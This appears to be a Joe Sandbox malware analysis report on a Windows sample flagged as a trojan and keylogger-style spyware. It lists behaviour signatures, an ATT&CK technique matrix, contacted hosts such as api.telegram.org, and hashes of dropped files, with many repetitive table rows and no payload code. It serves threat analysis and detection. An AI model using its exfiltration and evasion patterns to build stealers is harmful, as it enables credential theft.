Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_00405C63 | |
Source: | Code function: | 0_2_00402910 | |
Source: | Code function: | 0_2_004068B4 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3669 | ||
Source: | API call chain: | graph_0-3674 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_04A7D6E4 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_6FF61096 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00403532 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 2 Obfuscated Files or Information | LSASS Memory | 116 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 111 Process Injection | 1 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
21% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
21% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
reallyfreegeoip.org | 188.114.97.3 | true | true | unknown | |
api.telegram.org | 149.154.167.220 | true | true | unknown | |
checkip.dyndns.com | 132.226.247.73 | true | false | unknown | |
checkip.dyndns.org | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
185.29.11.53 | unknown | European Union | 203557 | DATACLUB-NL | false | |
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1518332 |
Start date and time: | 2024-09-25 15:59:09 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 28s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | file.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/12@3/4 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: file.exe
Time | Type | Description |
---|---|---|
10:00:08 | API Interceptor | |
10:01:29 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | MicroClip | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | VIP Keylogger | Browse | |||
Get hash | malicious | XWorm | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |||
188.114.97.3 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
reallyfreegeoip.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
checkip.dyndns.com | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
api.telegram.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MicroClip | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MicroClip | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | NetSupport RAT, HTMLPhisher | Browse |
| ||
Get hash | malicious | HtmlDropper | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | PureLog Stealer, XWorm | Browse |
| ||
DATACLUB-NL | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | RedLine | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | CryptOne, Qbot | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | S400 RAT | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | NetSupport RAT, HTMLPhisher | Browse |
| ||
Get hash | malicious | HtmlDropper | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer, XWorm | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7168 |
Entropy (8bit): | 5.2959870663251625 |
Encrypted: | false |
SSDEEP: | 96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM |
MD5: | B4579BC396ACE8CAFD9E825FF63FE244 |
SHA1: | 32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C |
SHA-256: | 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B |
SHA-512: | 3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 72766 |
Entropy (8bit): | 5.199237020314929 |
Encrypted: | false |
SSDEEP: | 1536:13twgdZfLUclpxZnFhI/8Qb+X/JDOsq3eJwdCzDzZier9:13qUFUclCzb+xDO/arr9 |
MD5: | 99EBA9ECC95F62898E4DF3AA12CB4624 |
SHA1: | C21A35B90111B01C32C9E963B20AAA01B35658A6 |
SHA-256: | B8408FC8DF3CD3C0938D8314568B278D72CB102B8D128A11608CAB75A2046B21 |
SHA-512: | 42B40C55DC01197D21B6DBB5C4D0CA77BE2CA890A70FAB1E0022DEFBDE7204A8B19387915FE144B540333BDB72FDE557E8F1673131830FAF455AA0FB25E6A347 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 750104 |
Entropy (8bit): | 7.620010644230869 |
Encrypted: | false |
SSDEEP: | 12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ |
MD5: | 7FBB332B55F872E61C8307E0B5242287 |
SHA1: | B499466240EF01DA4A2CF380D709752B2E44232A |
SHA-256: | 9845ACC424512CC5B0C67DE96CE917624B5E80EE95EA4EA6A7CBC37B7C03EF63 |
SHA-512: | E813F006263B87A5078BCA9C58B94567AC8DF627B27D44411774B797BDD7095F9BEBAFF8A1D2F0329B8FC63016199EF7E04EC17D68CE28B250CD3DA37C2E8D04 |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
